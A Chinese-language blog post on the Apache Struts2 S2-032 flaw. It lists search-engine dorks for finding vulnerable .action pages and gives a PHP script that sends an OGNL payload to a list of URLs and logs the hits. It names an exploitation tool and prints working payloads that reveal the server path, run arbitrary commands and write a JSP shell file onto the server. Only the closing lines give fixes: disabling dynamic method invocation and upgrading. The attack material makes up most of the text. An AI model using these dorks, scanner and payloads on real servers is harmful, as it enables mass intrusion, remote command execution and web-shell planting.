Struts2-032漏洞


关键字:

inurl:VloginUser.action 
inurl:Mail.action 
inurl:code.action 
inurl:reg.action 
inurl:Address.action 
inurl:!Index.action 
inurl:login.action 
inurl:Add.action 
inurl:pageslist.action 
inurl:action.Action 
inurl:Message.action 
inurl:Ldap.action 
inurl:getMul.action 
inurl:shouye.action 
inurl:logout.action 
inurl:Valid.action 
inurl:search.action 
inurl:Magazine.action 
inurl:news.action 
inurl:init.action 
inurl:Page.action 
inurl:create.action 
inurl:index2.action 
inurl:default.action 
inurl:welcome.action 
inurl:Name.action 
inurl:single.action 
inurl:updateForm.action 
inurl:SysStart.action 
inurl:adminlogin.action 
inurl:Offportal.action 
inurl:Buying.action 
inurl:Success.action 
inurl:exchange.action 
inurl:menu.action 
inurl:Load.action 
inurl:airport.action 
inurl:Email.action 
inurl:On.action 
inurl:show.action 
inurl:tain.action 
inurl:Login!input.action 
inurl:randomPicture.action


批量检测PHP脚本:

<?php 

/* 
Strutr2-032 Scan
By:Asphxg
*/ 
error_reporting(0); 
if(empty($argv[1])){ 
  print_r(" 
+========================+ 
|   Strutr2-032 Scan     | 
|    WwW.96sec.OrG       | 
|      By:Asphxg         | 
+========================+ 

->php $argv[0] url.txt 
    ");exit; 
} 

$txt = explode("\n",file_get_contents($argv[1])); 

echo "[+]$argv[1] 共 ".count($txt)." 条\r\n"; 


$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8"; 

for($i = 0;$i<count($txt);$i++){ 
  if(!empty($txt[$i])){ 
    $u = trim($txt[$i]).$poc; 
    $data_str = c($u); 
    if(stripos($data_str,"</") || empty($data_str)){ 
      echo trim($txt[$i])."  No \n"; 
    }else{ 
      echo trim($txt[$i])."  Yes  Path:".trim($data_str)." \n"; 
      $fp = fopen($argv[1]."_OK.txt",'a+'); 
      fwrite($fp,trim($txt[$i])."\r\n"); 
      fclose($fp); 
    } 
  } 
} 
echo "\r\n[+]ScanOk Ps:".$argv[1]."_OK.txt"; 

function c($url){ 
  $c = curl_init(); 
  curl_setopt($c,CURLOPT_URL,$url); 
  curl_setopt($c,CURLOPT_BINARYTRANSFER,true); 
  curl_setopt($c, CURLOPT_HEADER, 0); 
  curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)'); 
  curl_setopt($c, CURLOPT_TIMEOUT, 15); 
  curl_setopt($c, CURLOPT_REFERER, $url); 
  curl_setopt($c,CURLOPT_RETURNTRANSFER,1); 
  $data = curl_exec($c); 
  return $data; 
  curl_close($c); 
} 

?>


漏洞利用工具:


Struts2漏洞利用工具2016版.rar


Poc:

获取磁盘目录: 
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8 

执行命令: 
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\\\A&ppp=%20&encoding=UTF-8 

2. 
method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=\\\\AAAA&ppp=%20&encoding=UTF-8 

上传文件: 
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f


两种解决方法:

1、禁用动态方法调用

修改Struts2的配置文件,将"struts.enable.DynamicMethodInvocation"的值设置为false,比如:

<constant name="struts.enable.DynamicMethodInvocation" value="false" />;

2、升级软件版本

如果条件允许,可升级Struts版本至2.3.20.2、2.3.24.2或者2.3.28.1,这几个版本都不存在此漏洞。

升级地址:https://struts.apache.org/download.cgi#struts23281


评论回复